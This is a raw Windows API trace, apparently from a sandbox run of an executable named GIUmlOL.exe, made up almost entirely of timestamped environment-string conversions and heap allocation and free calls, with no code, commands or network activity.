lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xca) returned 0x474400 [0258.569] GetEnvironmentStringsW () returned 0x488100* [0258.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4e6) returned 0x488ae0 [0258.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x488ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0258.569] FreeEnvironmentStringsW (penv=0x488100) returned 1 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x118) returned 0x47a590 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1f) returned 0x47b7a0 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x4798f0 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x474b40 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480c70 [0258.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x474b80 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x479c20 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b4a0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd) returned 0x473fb0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1d) returned 0x47b3b0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x474bc0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x15) returned 0x474c00 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17) returned 0x474090 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4725f0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x69) returned 0x473eb0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3e) returned 0x480360 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1d) returned 0x47b890 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x4803b0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x473f30 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x473f50 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1b) returned 0x47b590 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47b440 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x29) returned 0x47ba20 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47b2c0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x6b) returned 0x47ba60 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17) returned 0x473f70 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf) returned 0x47bae0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x16) returned 0x478d00 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2a) returned 0x488250 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x29) returned 0x488490 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x478d20 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x21) returned 0x47b2f0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x16) returned 0x4892e0 [0258.570] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x22) returned 0x47b320 [0258.571] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x489360 [0258.571] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488ae0 | out: hHeap=0x470000) returned 1 [0258.571] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3a7) returned 0x4893e0 [0258.724] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47b350 [0258.724] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3a7) returned 0x493790 [0258.726] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.726] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfef7) returned 0x49db40 [0258.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x480090 [0258.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfef7) returned 0x4ada40 [0258.732] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b350 | out: hHeap=0x470000) returned 1 [0258.732] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49db40 | out: hHeap=0x470000) returned 1 [0258.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x450) returned 0x488910 [0258.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x450) returned 0x4bd940 [0258.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1ea7) returned 0x4bdda0 [0258.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf40) returned 0x4893e0 [0258.735] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x7a0) returned 0x48a330 [0258.735] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bdda0 | out: hHeap=0x470000) returned 1 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xbf0) returned 0x4893e0 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48a330 | out: hHeap=0x470000) returned 1 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x640) returned 0x488910 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1247) returned 0x4bd940 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x520) returned 0x488910 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b56) returned 0x4893e0 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8a0) returned 0x4bd940 [0258.736] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28ed) returned 0x48af40 [0258.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.737] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x550) returned 0x488910 [0258.737] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.737] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2537) returned 0x4bd940 [0258.737] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12b7) returned 0x4893e0 [0258.738] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x950) returned 0x48d840 [0258.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.738] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3d4f) returned 0x48e1a0 [0258.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48af40 | out: hHeap=0x470000) returned 1 [0258.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48d840 | out: hHeap=0x470000) returned 1 [0258.738] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2377) returned 0x4bd940 [0258.739] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x11d7) returned 0x491f00 [0258.739] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8e0) returned 0x4893e0 [0258.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x491f00 | out: hHeap=0x470000) returned 1 [0258.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.739] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5b0) returned 0x488910 [0258.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.739] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x640) returned 0x488910 [0258.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5be2) returned 0x49db40 [0258.740] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48e1a0 | out: hHeap=0x470000) returned 1 [0258.740] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x890) returned 0x4bd940 [0258.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xac0) returned 0x4bd940 [0258.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47b6b0 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x960) returned 0x4bd940 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x960) returned 0x4be2b0 [0258.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x460) returned 0x488910 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe0f) returned 0x4bec20 [0258.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be2b0 | out: hHeap=0x470000) returned 1 [0258.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c17) returned 0x4a3730 [0258.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe00) returned 0x4bd940 [0258.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x700) returned 0x4a5350 [0258.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a3730 | out: hHeap=0x470000) returned 1 [0258.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x153d) returned 0x4a3730 [0258.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bec20 | out: hHeap=0x470000) returned 1 [0258.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a5350 | out: hHeap=0x470000) returned 1 [0258.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2277) returned 0x4bd940 [0258.742] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1157) returned 0x4a4c80 [0258.743] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8a0) returned 0x4a5de0 [0258.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4c80 | out: hHeap=0x470000) returned 1 [0258.743] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1fc7) returned 0x4bd940 [0258.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a3730 | out: hHeap=0x470000) returned 1 [0258.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a5de0 | out: hHeap=0x470000) returned 1 [0258.743] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1657) returned 0x4a3730 [0258.743] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xb20) returned 0x4a4d90 [0258.743] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x590) returned 0x4bf910 [0258.744] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a3730 | out: hHeap=0x470000) returned 1 [0258.744] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4d90 | out: hHeap=0x470000) returned 1 [0258.744] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2f96) returned 0x4a3730 [0258.744] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.744] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf910 | out: hHeap=0x470000) returned 1 [0258.744] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2b47) returned 0x4a66d0 [0258.744] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x15b7) returned 0x4bd940 [0258.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xad0) returned 0x4bef00 [0258.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a66d0 | out: hHeap=0x470000) returned 1 [0258.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bef00 | out: hHeap=0x470000) returned 1 [0258.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2697) returned 0x4a66d0 [0258.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1367) returned 0x4bd940 [0258.746] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9a0) returned 0x4becb0 [0258.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a66d0 | out: hHeap=0x470000) returned 1 [0258.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.746] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x474d) returned 0x4a66d0 [0258.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a3730 | out: hHeap=0x470000) returned 1 [0258.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4becb0 | out: hHeap=0x470000) returned 1 [0258.746] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x920) returned 0x4bd940 [0258.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.747] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b47) returned 0x4bd940 [0258.747] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xd90) returned 0x4aae30 [0258.747] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6d0) returned 0x4bf490 [0258.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.747] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4aae30 | out: hHeap=0x470000) returned 1 [0258.748] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf490 | out: hHeap=0x470000) returned 1 [0258.748] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5d0) returned 0x488910 [0258.748] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6adf) returned 0x4893e0 [0258.748] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a66d0 | out: hHeap=0x470000) returned 1 [0258.748] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.748] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1887) returned 0x4bd940 [0258.748] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc30) returned 0x4bf1d0 [0258.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x620) returned 0x488910 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf1d0 | out: hHeap=0x470000) returned 1 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8f0) returned 0x4bd940 [0258.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x480) returned 0x488910 [0258.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x240) returned 0x4be240 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be240 | out: hHeap=0x470000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x480d60 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b6b0 | out: hHeap=0x470000) returned 1 [0258.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49db40 | out: hHeap=0x470000) returned 1 [0258.806] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.807] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x480d60 | out: hHeap=0x470000) returned 1 [0258.807] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9900) returned 0x4893e0 [0258.808] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bf0) returned 0x4bd940 [0258.810] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9937) returned 0x49db40 [0258.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.811] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47b6b0 [0258.811] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9900) returned 0x4893e0 [0258.811] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bf0) returned 0x4bd940 [0258.812] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9937) returned 0x4bd940 [0258.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4893e0 | out: hHeap=0x470000) returned 1 [0258.814] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x47ffa0 [0258.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b6b0 | out: hHeap=0x470000) returned 1 [0258.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x493790 | out: hHeap=0x470000) returned 1 [0258.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada40 | out: hHeap=0x470000) returned 1 [0258.815] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x480090 | out: hHeap=0x470000) returned 1 [0258.815] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4893e0 [0258.920] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4a7480 [0258.920] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x478d40 [0258.920] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4c7280 [0258.921] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489240 [0258.921] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x478d40 | out: hHeap=0x470000) returned 1 [0258.921] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4da490 [0258.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x489220 [0258.922] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489240 | out: hHeap=0x470000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4ed6a0 [0258.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47b350 [0258.922] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489220 | out: hHeap=0x470000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x5008b0 [0258.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x30) returned 0x488290 [0258.923] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b350 | out: hHeap=0x470000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x513ac0 [0258.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x526cd0 [0258.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x48) returned 0x4806d0 [0258.924] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488290 | out: hHeap=0x470000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x539ee0 [0258.925] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x54d0f0 [0258.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1e50080 [0258.934] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x478d40 [0258.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4806d0 | out: hHeap=0x470000) returned 1 [0258.934] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1e63290 [0258.934] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1e764a0 [0258.935] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1e896b0 [0258.935] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1e9c8c0 [0258.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x98) returned 0x474c50 [0258.936] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x478d40 | out: hHeap=0x470000) returned 1 [0258.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1eafad0 [0258.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1ec2ce0 [0258.937] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1ed5ef0 [0258.938] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1ee9100 [0258.938] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1efc310 [0258.939] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f0f520 [0258.939] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe0) returned 0x474880 [0258.939] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474c50 | out: hHeap=0x470000) returned 1 [0258.939] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f22730 [0258.940] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fb0080 [0258.941] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fc3290 [0258.941] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fd64a0 [0258.942] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fe96b0 [0258.942] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1ffc8c0 [0258.943] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x200fad0 [0258.943] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2022ce0 [0258.944] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2035ef0 [0258.944] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x150) returned 0x47b0b0 [0258.944] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474880 | out: hHeap=0x470000) returned 1 [0258.944] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2049100 [0258.945] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x205c310 [0258.945] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x206f520 [0258.946] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2082730 [0258.946] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2095940 [0258.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20a8b50 [0258.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20bbd60 [0258.948] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20cef70 [0258.948] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20e2180 [0258.949] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20f5390 [0258.949] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21085a0 [0258.950] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x211b7b0 [0258.950] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x212e9c0 [0258.951] 